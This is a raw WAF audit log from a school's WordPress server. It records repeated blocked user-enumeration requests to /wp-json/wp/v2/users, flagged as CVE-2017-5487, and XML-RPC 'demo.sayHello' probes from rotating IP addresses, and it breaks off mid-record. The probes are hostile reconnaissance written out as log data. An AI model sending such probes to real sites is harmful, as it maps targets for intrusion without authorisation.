Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f93cc817-Z-- --fe7cf32a-A-- [18/May/2025:00:40:45 +0700] aCjKHQTOsBn9MSWb6WJyhAAAAII 103.236.140.4 47412 103.236.140.4 8181 --fe7cf32a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe7cf32a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe7cf32a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503645550760 2790 (- - -) Stopwatch2: 1747503645550760 2790; combined=1646, p1=520, p2=1098, p3=0, p4=0, p5=28, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe7cf32a-Z-- --588b2c2d-A-- [18/May/2025:00:40:50 +0700] aCjKIhKi5m5upc8uMd7ETgAAANI 103.236.140.4 47774 103.236.140.4 8181 --588b2c2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --588b2c2d-C-- demo.sayHello --588b2c2d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --588b2c2d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503650485836 4473 (- - -) Stopwatch2: 1747503650485836 4473; combined=3562, p1=453, p2=2886, p3=38, p4=39, p5=85, sr=55, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --588b2c2d-Z-- --9ac0e869-A-- [18/May/2025:00:41:03 +0700] aCjKL-m4kjNN-hEbWjI8oQAAAEM 103.236.140.4 48750 103.236.140.4 8181 --9ac0e869-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ac0e869-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ac0e869-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503663549091 2135 (- - -) Stopwatch2: 1747503663549091 2135; combined=959, p1=321, p2=613, p3=0, p4=0, p5=25, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ac0e869-Z-- --e67e946b-A-- [18/May/2025:00:41:13 +0700] aCjKOXyxdQCiyU1ENFc4agAAAA8 103.236.140.4 49460 103.236.140.4 8181 --e67e946b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e67e946b-C-- demo.sayHello --e67e946b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e67e946b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503673501101 5444 (- - -) Stopwatch2: 1747503673501101 5444; combined=4055, p1=545, p2=3240, p3=36, p4=41, p5=114, sr=67, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e67e946b-Z-- --47609a57-A-- [18/May/2025:00:42:22 +0700] aCjKfhKi5m5upc8uMd7GywAAAME 103.236.140.4 53338 103.236.140.4 8181 --47609a57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --47609a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47609a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503742522191 13554 (- - -) Stopwatch2: 1747503742522191 13554; combined=23785, p1=369, p2=698, p3=0, p4=0, p5=11371, sr=60, sw=0, l=0, gc=11347 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47609a57-Z-- --1ef79c7e-A-- [18/May/2025:00:42:29 +0700] aCjKhXyxdQCiyU1ENFc57gAAAA8 103.236.140.4 53596 103.236.140.4 8181 --1ef79c7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1ef79c7e-C-- demo.sayHello --1ef79c7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ef79c7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503749050784 5815 (- - -) Stopwatch2: 1747503749050784 5815; combined=4278, p1=655, p2=3408, p3=36, p4=42, p5=83, sr=73, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ef79c7e-Z-- --2b613423-A-- [18/May/2025:00:44:36 +0700] aCjLBATOsBn9MSWb6WJ3ugAAAJU 103.236.140.4 60846 103.236.140.4 8181 --2b613423-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2b613423-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b613423-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503876762063 2347 (- - -) Stopwatch2: 1747503876762063 2347; combined=1117, p1=339, p2=754, p3=0, p4=0, p5=24, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b613423-Z-- --56ddb04d-A-- [18/May/2025:00:44:41 +0700] aCjLCem4kjNN-hEbWjJCJgAAAFA 103.236.140.4 32800 103.236.140.4 8181 --56ddb04d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --56ddb04d-C-- demo.sayHello --56ddb04d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --56ddb04d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503881002949 5647 (- - -) Stopwatch2: 1747503881002949 5647; combined=4323, p1=565, p2=3471, p3=44, p4=57, p5=132, sr=64, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56ddb04d-Z-- --9ce77916-A-- [18/May/2025:00:44:43 +0700] aCjLCxKi5m5upc8uMd7K7AAAANg 103.236.140.4 32900 103.236.140.4 8181 --9ce77916-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ce77916-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ce77916-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503883154546 1984 (- - -) Stopwatch2: 1747503883154546 1984; combined=862, p1=291, p2=552, p3=0, p4=0, p5=19, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ce77916-Z-- --6d1af93e-A-- [18/May/2025:00:44:56 +0700] aCjLGHyxdQCiyU1ENFc8egAAAAM 103.236.140.4 33438 103.236.140.4 8181 --6d1af93e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6d1af93e-C-- demo.sayHello --6d1af93e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d1af93e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503896547235 5774 (- - -) Stopwatch2: 1747503896547235 5774; combined=4278, p1=529, p2=3519, p3=36, p4=40, p5=91, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d1af93e-Z-- --e0f2e966-A-- [18/May/2025:00:45:51 +0700] aCjLTxKi5m5upc8uMd7MzQAAAMw 103.236.140.4 37474 103.236.140.4 8181 --e0f2e966-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0f2e966-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0f2e966-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503951396210 2222 (- - -) Stopwatch2: 1747503951396210 2222; combined=1077, p1=354, p2=693, p3=0, p4=0, p5=30, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0f2e966-Z-- --78f4b958-A-- [18/May/2025:00:45:57 +0700] aCjLVQTOsBn9MSWb6WJ5kgAAAI8 103.236.140.4 37948 103.236.140.4 8181 --78f4b958-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78f4b958-C-- demo.sayHello --78f4b958-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78f4b958-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503957912678 6214 (- - -) Stopwatch2: 1747503957912678 6214; combined=4727, p1=529, p2=3963, p3=46, p4=48, p5=83, sr=49, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78f4b958-Z-- --9b7b9368-A-- [18/May/2025:00:47:08 +0700] aCjLnHyxdQCiyU1ENFc__wAAABE 103.236.140.4 43034 103.236.140.4 8181 --9b7b9368-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9b7b9368-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b7b9368-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504028327007 3654 (- - -) Stopwatch2: 1747504028327007 3654; combined=2110, p1=672, p2=1399, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b7b9368-Z-- --6fcd9161-A-- [18/May/2025:00:47:13 +0700] aCjLoRKi5m5upc8uMd7PEwAAAMA 103.236.140.4 43294 103.236.140.4 8181 --6fcd9161-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.181 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6fcd9161-C-- demo.sayHello --6fcd9161-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fcd9161-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504033925971 6377 (- - -) Stopwatch2: 1747504033925971 6377; combined=5029, p1=684, p2=4106, p3=42, p4=62, p5=82, sr=63, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fcd9161-Z-- --aa780072-A-- [18/May/2025:00:49:49 +0700] aCjMPem4kjNN-hEbWjJK0QAAAFA 103.236.140.4 54326 103.236.140.4 8181 --aa780072-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa780072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa780072-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504189982152 3160 (- - -) Stopwatch2: 1747504189982152 3160; combined=1726, p1=531, p2=1165, p3=0, p4=0, p5=29, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa780072-Z-- --c73cf01d-A-- [18/May/2025:00:49:59 +0700] aCjMRxKi5m5upc8uMd7TkQAAAMM 103.236.140.4 54808 103.236.140.4 8181 --c73cf01d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c73cf01d-C-- demo.sayHello --c73cf01d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c73cf01d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504199926683 7188 (- - -) Stopwatch2: 1747504199926683 7188; combined=5743, p1=786, p2=4695, p3=47, p4=64, p5=91, sr=71, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c73cf01d-Z-- --2edd4e7c-A-- [18/May/2025:00:50:06 +0700] aCjMTum4kjNN-hEbWjJLGgAAAEg 103.236.140.4 55072 103.236.140.4 8181 --2edd4e7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2edd4e7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2edd4e7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file 